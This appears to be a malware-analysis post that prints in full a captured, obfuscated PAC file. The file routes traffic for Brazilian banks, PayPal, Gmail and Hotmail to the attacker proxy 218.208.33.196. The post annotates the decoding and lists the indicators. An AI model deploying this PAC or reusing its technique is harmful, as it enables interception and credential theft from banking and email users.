I captured this PAC file last week; it uses a small obfuscation technique:
// Obfuscated PAC sample (analysed as captured, not corrected). Each entry in `n`
// is a mangled hostname that is decoded at runtime by the replace() chain below
// and then compared with the requested host; a match routes the browser through
// a fixed proxy, everything else goes DIRECT.
// Defensive note: the indicators are the PROXY address returned below and the
// decoded host list; a client whose auto-proxy URL points at that address is
// already configured to hand these sessions to the proxy.
function FindProxyForURL(url, host) {
  // Mangled host list. The substitutions below (f->e, z->y, duh->www, y->i)
  // reverse the obfuscation; "santanderempresarial" is already in the clear.
  var n = new Array("duh.bradfsco", "bradfsco", "duh.bradfscoprimf", "bradfscoprimf", "duh.santandfrfmprfsaryal", "santandfrfmprfsaryal", "hsbc", "duh.hsbc", "hsbcprfmyfr", "duh.hsbcprfmyfr", "santandfrfmprfsaryal", "santanderempresarial", "banfspa", "duh.banfspa", "santandfr", "duh.santandfr", "santandfr", "bancorfal", "duh.bancorfal", "syds.mg.gov.br", "duh.syds.mg.gov.br", "cytybank", "duh.cytybank", "sycredy", "duh.sycredy", "amerycanexpress", "duh.amerycanexpress", "ytau", "duh.ytau", "ytaupersonnalyte", "duh.ytaupersonnalyte", "hotmayl", "duh.hotmayl", "lyve", "duh.lyve", "pazpal", "duh.pazpal", "cayxa.gov.br", "duh.cayxa.gov.br", "duh.gmayl", "gmayl", "duh.hotmayl", "hotmayl" );
  for(var i =0;i<n.length;i++) {
    // `str` is never declared with var, so it is an implicit global.
    str = n[i];
    str = str.replace(/f/gi,"e");
    str = str.replace(/z/gi,"y");
    str = str.replace(/duh/gi,"www");
    // Runs after z->y, so any 'y' produced by that step is also turned into
    // 'i' (e.g. "pazpal" decodes to "paipal", not "paypal").
    str = str.replace(/y/gi, "i");
    // Suffix selection. The caixa branch is a no-op (the entry already carries
    // ".gov.br"); given the decoding order above no entry can contain "paypal",
    // so that branch looks unreachable; "syds.mg.gov.br" falls through to the
    // ".com.br" default.
    if(str.indexOf("caixa") != -1) str = str;
    else if(str.indexOf("paypal") != -1) str = str + ".com";
    else if(str.indexOf("gmail") != -1) str = str + ".com";
    else if(str.indexOf("hotmail") != -1) str = str + ".com";
    else str = str + ".com.br";
    // The decoded pattern contains no wildcards, so shExpMatch is effectively
    // a whole-string comparison against the requested host (case handling
    // depends on the PAC engine). A match sends the session to the proxy
    // address hard-coded here, which is the interception point.
    if (shExpMatch(host, str)) {
      return "PROXY 218.208.33.196:80";
    }
  }
  // Non-targeted hosts are left untouched, which keeps the PAC inconspicuous.
  return "DIRECT";
}
Note that, besides Brazilian banks, it also targets credentials for
Gmail, Hotmail/Live and PayPal.
The auto-proxy configuration URL that I found:
http://218.208.33.196/readme/feather.txt
This IP has a bad reputation for open-proxy, spam
and phishing activity.
Some references by @assoline:
Benign_Feature_Malicious_Use
attackers-using-malicious-pac-files-phishing-attacks